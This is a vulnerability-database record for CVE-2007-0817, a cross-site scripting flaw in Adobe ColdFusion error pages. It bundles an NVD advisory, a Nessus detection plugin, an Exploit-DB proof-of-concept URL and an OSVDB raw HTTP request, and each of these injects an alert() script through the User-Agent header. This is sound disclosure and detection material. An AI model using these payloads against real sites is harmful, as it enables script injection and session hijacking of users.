ID CVE-2007-0817Type cveReporter NVDModified 2018-10-16T12:34:52
Description
Cross-site scripting (XSS) vulnerability in Adobe ColdFusion web server allows remote attackers to inject arbitrary HTML or web script via the User-Agent HTTP header, which is not sanitized before being displayed in an error page.
{"id": "CVE-2007-0817", "bulletinFamily": "NVD", "title": "CVE-2007-0817", "description": "Cross-site scripting (XSS) vulnerability in Adobe ColdFusion web server allows remote attackers to inject arbitrary HTML or web script via the User-Agent HTTP header, which is not sanitized before being displayed in an error page.", "published": "2007-02-07T06:28:00", "modified": "2018-10-16T12:34:52", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0817", "reporter": "NVD", "references": ["http://www.securitytracker.com/id?1017645", "http://www.securityfocus.com/archive/1/459178/100/0/threaded", "http://www.adobe.com/support/security/bulletins/apsb07-04.html", "http://www.vupen.com/english/advisories/2007/0593", "http://www.securityfocus.com/bid/22401"], "cvelist": ["CVE-2007-0817"], "type": "cve", "lastseen": "2018-10-18T15:06:08", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:adobe:coldfusion:6.1", "cpe:/a:adobe:coldfusion:7.0.1", "cpe:/a:adobe:coldfusion:7.0.2"], "cvelist": ["CVE-2007-0817"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Cross-site scripting (XSS) vulnerability in Adobe ColdFusion web server allows remote attackers to inject arbitrary HTML or web script via the User-Agent HTTP header, which is not sanitized before being displayed in an error page.", "edition": 1, "enchantments": {"score": {"modified": "2016-09-03T08:25:33", "value": 4.3, "vector": "NONE"}}, "hash": "1da50ed2fdd8844ce39189a031adc32c0ecc7680ac20a7af50eb136733b46ea9", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "cf03685de5396011bf15c2b32f2e539a", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "c15e9492e1c749f479262336634f7abc", "key": "title"}, {"hash": "2069139334cc4e35cd6c59fd9ce2ea0c", "key": "references"}, {"hash": "91816da8443dad30addfe5d1cd33c3da", "key": "cpe"}, {"hash": "9945b5e2505170893cfd346c6bb1f906", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "44cecfaffc1d2cbcade57e1a7fe5f012", "key": "cvelist"}, {"hash": "bca7c6a171c8afc0d2f0cab2b2a93801", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "49232abc6c194796609220a252e224c2", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0817", "id": "CVE-2007-0817", "lastseen": "2016-09-03T08:25:33", "modified": "2011-03-07T21:50:46", "objectVersion": "1.2", "published": "2007-02-07T06:28:00", "references": ["http://www.securitytracker.com/id?1017645", "http://www.adobe.com/support/security/bulletins/apsb07-04.html", "http://www.securityfocus.com/archive/1/archive/1/459178/100/0/threaded", "http://www.vupen.com/english/advisories/2007/0593", "http://www.securityfocus.com/bid/22401"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-0817", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T08:25:33"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "91816da8443dad30addfe5d1cd33c3da"}, {"key": "cvelist", "hash": "44cecfaffc1d2cbcade57e1a7fe5f012"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "bca7c6a171c8afc0d2f0cab2b2a93801"}, {"key": "href", "hash": "49232abc6c194796609220a252e224c2"}, {"key": "modified", "hash": "db86e8d995f25dba33f286b88a0e263f"}, {"key": "published", "hash": "cf03685de5396011bf15c2b32f2e539a"}, {"key": "references", "hash": "fdba2db280fc0ca732047f1685e0035a"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "c15e9492e1c749f479262336634f7abc"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "677073994e352f43d8f62a4dbf4c7b4e565e16a4332c12a59eb951ca3b18d26d", "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-10-18T15:06:08"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7185"]}, {"type": "nessus", "idList": ["COLDFUSION_XSS_ERROR_PROCESSING_REQUEST.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:29567"]}, {"type": "osvdb", "idList": ["OSVDB:32120"]}, {"type": "jvn", "idList": ["JVN:48566866"]}], "modified": "2018-10-18T15:06:08"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "cpe": ["cpe:/a:adobe:coldfusion:6.1", "cpe:/a:adobe:coldfusion:7.0.1", "cpe:/a:adobe:coldfusion:7.0.2"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"nessus": [{"lastseen": "2019-01-16T20:07:07", "bulletinFamily": "scanner", "description": "The version of Adobe ColdFusion running on the remote host fails to\nproperly sanitize user-supplied input to the User-Agent header before\nusing it to generate dynamic content in an error page. A remote,\nunauthenticated attacker can exploit this issue to inject arbitrary\nHTML or script code into a user's browser to be executed within the\nsecurity context of the affected site.", "modified": "2018-11-15T00:00:00", "published": "2007-02-06T00:00:00", "id": "COLDFUSION_XSS_ERROR_PROCESSING_REQUEST.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24278", "title": "ColdFusion Web Server User-Agent HTTP Header Error Message XSS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24278);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2007-0817\");\n script_bugtraq_id(22401);\n script_xref(name:\"EDB-ID\", value:\"29567\");\n\n script_name(english:\"ColdFusion Web Server User-Agent HTTP Header Error Message XSS\");\n script_summary(english:\"Checks for an XSS flaw in ColdFusion.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote web server is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe ColdFusion running on the remote host fails to\nproperly sanitize user-supplied input to the User-Agent header before\nusing it to generate dynamic content in an error page. A remote,\nunauthenticated attacker can exploit this issue to inject arbitrary\nHTML or script code into a user's browser to be executed within the\nsecurity context of the affected site.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/459178/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb07-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as described in the vendor advisory above.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:coldfusion\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"coldfusion_detect.nasl\");\n script_require_keys(\"installed_sw/ColdFusion\");\n script_require_ports(\"Services/www\", 80, 8500);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"install_func.inc\");\n\napp = 'ColdFusion';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\n# Send a request to exploit the flaw.\nxss = \"<script>alert(\"+SCRIPT_NAME -\".nasl\"+\"-\"+unixtime()+\")</script>\";\nurl = \"/CFIDE/administrator/nessus-\" + unixtime()+\".cfm\";\nr = http_send_recv3(method:\"GET\", item:dir+url, port:port, exit_on_fail: TRUE,\n add_headers: make_array(\"User-Agent\", xss));\nres = r[2];\n\n# There's a problem if our exploit appears as the user agent.\nbrowser = strstr(res, \">Browser </\");\nif (browser)\n{\n browser = browser - strstr(browser, \"</tr>\");\n browser = strstr(browser, \"<td>\");\n browser = browser - strstr(browser, \"</td>\");\n # nb: browser includes some extra markup.\n if (\">\"+ xss >< browser)\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n xss : TRUE, # XSS KB key\n request : make_list(http_last_sent_request()),\n output : chomp(browser)\n );\n exit(0);\n }\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T10:36:37", "bulletinFamily": "exploit", "description": "Adobe ColdFusion 6/7 User_Agent Error Page Cross-Site Scripting Vulnerability. CVE-2007-0817. Webapps exploit for cfm platform", "modified": "2007-02-05T00:00:00", "published": "2007-02-05T00:00:00", "id": "EDB-ID:29567", "href": "https://www.exploit-db.com/exploits/29567/", "type": "exploitdb", "title": "Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/22401/info\r\n\r\nAdobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nAn attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. \r\n\r\nhttp://www.example.com/&USER_AGENT=%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/s> cript%3E&HTTP_REFERER=http://www.google.com/ ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/29567/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "User-Agent field from HTTP request is used unfiltered in error message text. It's possible to manipulate client's User-Agent field through Flash.", "modified": "2007-02-05T00:00:00", "published": "2007-02-05T00:00:00", "id": "SECURITYVULNS:VULN:7185", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7185", "title": "ColdFusion crossite scripting", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Manual Testing Notes\nGET /CFIDE/administrator/btins.cfm HTTP/1.1\nAccept: */*\nAccept-Language: en-us\nUA-CPU: x86\nAccept-Encoding: gzip, deflate\nUser-Agent: </td><script>alert('BTINS-XSS')</script>\nHost: 161.38.228.10\nProxy-Connection: Keep-Alive\nPragma: no-cache\nCookie: CFID=4023; CFTOKEN=82420413; JSESSIONID=683089a6c0e0$D91$E9$\n## References:\n[Vendor Specific Advisory URL](http://www.adobe.com/support/security/bulletins/apsb07-04.html)\nSecurity Tracker: 1017645\n[Secunia Advisory ID:24115](https://secuniaresearch.flexerasoftware.com/advisories/24115/)\n[Related OSVDB ID: 32121](https://vulners.com/osvdb/OSVDB:32121)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0044.html\nFrSIRT Advisory: ADV-2007-0593\n[CVE-2007-0817](https://vulners.com/cve/CVE-2007-0817)\nBugtraq ID: 22401\n", "modified": "2007-02-04T04:19:09", "published": "2007-02-04T04:19:09", "href": "https://vulners.com/osvdb/OSVDB:32120", "id": "OSVDB:32120", "title": "ColdFusion Web Server User-Agent HTTP Header Error Message XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "jvn": [{"lastseen": "2018-08-31T00:36:32", "bulletinFamily": "info", "description": "\n ## Description\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. If session information from a cookie is leaked, an attacker could possibly conduct session hijacking. \n\n ## Solution\n\n ## Products Affected\n\n * ColdFusion MX 6.X\n * ColdFusion MX 7.X\nFor more information, refer to the vendor's website. \n", "modified": "2008-05-21T00:00:00", "published": "2007-02-14T00:00:00", "id": "JVN:48566866", "href": "http://jvn.jp/en/jp/JVN48566866/index.html", "title": "JVN#48566866 ColdFusion error page cross-site scripting vulnerability", "type": "jvn", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
